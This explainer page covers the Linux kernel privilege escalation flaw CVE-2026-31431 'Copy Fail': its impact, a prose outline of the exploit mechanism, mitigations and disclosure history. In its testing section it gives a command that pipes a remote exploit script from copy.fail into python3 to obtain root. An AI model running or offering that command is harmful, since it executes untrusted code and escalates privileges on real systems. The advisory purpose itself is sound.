What is a Linux kernel vulnerability and how does it differ from application vulnerabilities?

What is the CVE-2026-31431 'Copy Fail' Linux vulnerability and how do I fix it?

Last updated: May 1, 2026

CVE-2026-31431 'Copy Fail' is a critical Linux kernel vulnerability allowing unprivileged users to gain root access across virtually all distributions since 2017.

Continue in Reels Listen and swipe through more answers in Technology

Vulnerability Type	Local privilege escalation in the kernel's crypto API affecting the algif_aead function
Root Cause	Logic flaw in AEAD template process for IPsec extended sequence numbers that fails to copy data, instead using caller's buffer as scratch pad
Affected Systems	All major Linux distributions since 2017, including Ubuntu 24, RHEL 10, SUSE 16, Amazon Linux 2023, Debian 12, and Windows WSL2
Exploit Size	Only 732 bytes required to execute the attack
Patched Kernel Versions	7.0, 6.19.12, 6.18.12, 6.12.85, 6.6.137, 6.1.170, 5.15.204, and 5.10.254
Reliability	Single Python script works across all vulnerable distributions without modification due to exploitation of deterministic logic flaw rather than race conditions

What the Vulnerability Does

CVE-2026-31431 allows any unprivileged user with code execution access to elevate themselves to root administrator. An attacker exploiting a separate vulnerability (like a WordPress plugin flaw) to gain shell access as an unprivileged user can then run the Copy Fail exploit to become root and access the entire system. This is particularly dangerous in multi-tenant environments such as Kubernetes containers, shared hosting, CI/CD pipelines, and WSL2 instances on Windows laptops where multiple users share the same Linux kernel.

How the Exploit Works

The vulnerability exploits the algif_aead kernel function's optimization flaw. An attacker provides data for encryption via an AF_ALG socket, splicing in an executable like 'su' as the tag. The authencesn encryption algorithm writes 4 bytes at a fixed offset in its output buffer, but because the tag data is chained by reference rather than copied, those 4 bytes get written directly into the kernel's cached copy of the executable. When the executable is called, it becomes corrupted with root privileges. This happens entirely in memory with no detectable disk writes.

How to Fix It

If your distribution has released a patched kernel version, install it immediately. If your distro compiles algif_aead as a loadable module, you can disable it by adding 'echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf'. For distributions that compile this functionality into the kernel core (such as RHEL and WSL2), you must prevent unprivileged users from opening AF_ALG sockets using seccomp profiles, AppArmor, or SELinux policies.

Verification and Testing

To check if your system is vulnerable, you can run 'curl https://copy.fail/exp | python3 && su' with a standard unprivileged account, though this involves trusting an online script. Alternatively, source code for the proof-of-concept exploit is publicly available for local verification.

Disclosure and Impact

Researchers from Theori privately disclosed the vulnerability five weeks before publicly releasing exploit code on Wednesday evening. The Linux kernel security team patched the vulnerability, but few distributions had incorporated those fixes before the exploit was released, creating a significant patch gap. Security experts have criticized the disclosure coordination, noting that at the time of public release, the four listed affected vendors had no patches available.

Why This Matters

This is considered the most severe Linux privilege escalation vulnerability in recent years, comparable to Dirty Pipe (2022) and Dirty Cow (2016). The exploit's reliability across all distributions with identical code, combined with its small size and the broad window of affected systems going back nine years, makes it an exceptional threat to data centers, container environments, and CI/CD pipelines worldwide.